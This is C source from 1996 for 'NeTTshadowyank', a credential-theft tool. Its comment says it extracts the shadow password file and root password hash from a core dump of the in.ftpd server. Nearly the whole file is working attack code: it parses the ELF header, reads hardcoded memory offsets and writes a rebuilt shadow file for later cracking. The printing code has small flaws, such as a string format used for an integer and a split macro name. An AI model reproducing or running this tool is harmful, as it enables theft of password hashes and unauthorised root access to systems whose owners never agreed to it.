/* NeTTshadowyank.c, by NeTTwerk (nettwerk@spyder.org) Oct 17, 1996 Released into the Public Domain (not for use with some sets) **NeTTshadowyank** Version 1.0 nettwerk@spyder.org NeTTshadowyank is a simple utility which reads a corefile created by in.ftpd, and pulls out the shadow file 8).. it also reconstructs the root password (which is corrupted in the shadow entry buffer), and puts it in the appropriate place in the targetfile 'NeTTshadowyank.shadow'. This is a really brainless program from the perspective that it does very *little* inteligence... Version 2.0, will have my infamous 'heuristics engine' which will *look* for shadow entries/passwd entries in the binary file. (btw: if you dont know *how* to make in.ftpd dump core with the shadow file inside it, tough luck) Greets for this little util go out for BioH,mudge,glyph (all the l0pht guys), bika,k,rommel,hobbit and of course,whoever wrote in.ftpd ;) latah. questions can be sent to nettwerk@spyder.org */ #include #include #include #include #include #include #include #include #include #define ROOT_OFFSET 0xd7d4 #define SHADOW_OFFSET 0xfadb void main(argc,argv) int argc; char **argv; { FILE *fp; FILE *fp2; char SZ_line[255]; Elf32_Ehdr *Telf32_hdr; int I_fd; void *Vp_buff; struct stat Sstat_buf; char *Cp_ptr; if (argc!=2) { printf("[NeTTshadowyank] Usage: %s corefilename\n",argv[0]); exit(0); } if ((I_fd=open(argv[1],O_RDONLY))<0) { perror("Opening Corefile"); exit(0); } if (fstat(I_fd,&Sstat_buf)<0) { perror("fstat()'ing file"); exit(0); } printf("[NeTTshadowyank] Loading %s, size %d bytes\n",argv[1],Sstat_buf.st_size); if (!(Vp_buff=malloc(Sstat_buf.st_size))) { printf("Out of Memory\n"); exit(0); } memset(Vp_buff,0,Sstat_buf.st_size); if (read(I_fd,(char *)Vp_buff,Sstat_buf.st_size)<0) { perror("Reading corefile"); exit(0); } Telf32_hdr = (Elf32_Ehdr *)Vp_buff; printf("File Type ->%c%c%c%c\n",Telf32_hdr->e_ident[EI_MAG0] ,Telf32_hdr->e_ident[EI _MAG1] ,Telf32_hdr->e_ident[EI _MAG2] ,Telf32_hdr->e_ident[EI _MAG3]); printf("File Class->0x%x",Telf32_hdr->e_ident[EI_CLASS]); if (Telf32_hdr->e_ident[EI_CLASS]==1) printf(" (32 Bit Binary)\n"); else if (Telf32_hdr->e_ident[EI_CLASS]==2) printf(" (64 Bit Binary)\n"); else printf(" (BAD Binary)\n"); printf("File Data ->0x%x",Telf32_hdr->e_ident[EI_DATA]); if (Telf32_hdr->e_ident[EI_DATA]==1) printf(" (Least Significant Bit)\n"); else if (Telf32_hdr->e_ident[EI_DATA]==2) printf(" (Most Significant Bit)\n"); else printf(" (BAD Binary)\n"); printf("File Vers ->0x%x\n",Telf32_hdr->e_ident[EI_VERSION]); printf("File Type ->0x%x",Telf32_hdr->e_type); if (Telf32_hdr->e_type==1) printf(" (Relocatable Executable)\n"); else if (Telf32_hdr->e_type==2) printf(" (EXEC Executable)\n"); else if (Telf32_hdr->e_type==3) printf(" (Dynamic Executable)\n"); else if (Telf32_hdr->e_type==4) printf(" (Core Dump [Post-Mortem])\n"); else if (Telf32_hdr->e_type==5) printf(" (Numeric Executable)\n"); else printf(" (Unknown Binary Format)\n"); Cp_ptr=Vp_buff+ROOT_OFFSET; printf("Root Password location (%s) ->%s\n",ROOT_OFFSET,Cp_ptr); printf("Reconstructing shadow file\n"); if (!(fp=fopen("NeTTshadowyank.scratch","w"))) { perror("Creating scratch file"); exit(0); } Cp_ptr=Vp_buff+SHADOW_OFFSET; while(1) { if (!strncmp(Cp_ptr,"lic_key",7)) break; if (*Cp_ptr=='#') break; if (*Cp_ptr==0) fprintf(fp," "); else fprintf(fp,"%c",*Cp_ptr); Cp_ptr++; } fclose(fp); if (!(fp=fopen("NeTTshadowyank.scratch","r"))) { perror("Opening Scratch File"); exit(0); } if (!(fp2=fopen("NeTTshadowyank.shadow","w"))) { perror("Creating target file"); exit(0); } while(fgets(SZ_line,sizeof(SZ_line),fp)) { SZ_line[(strlen(SZ_line)-1)]=0; if (!strncmp(SZ_line,"root",4)) { Cp_ptr=Vp_buff+ROOT_OFFSET; printf("[NeTTshadowyank] Repairing Root Shadow Entry\n"); fprintf(fp2,"root:%s:0::::::\n",Cp_ptr); } else fprintf(fp2,"%s\n",SZ_line); } }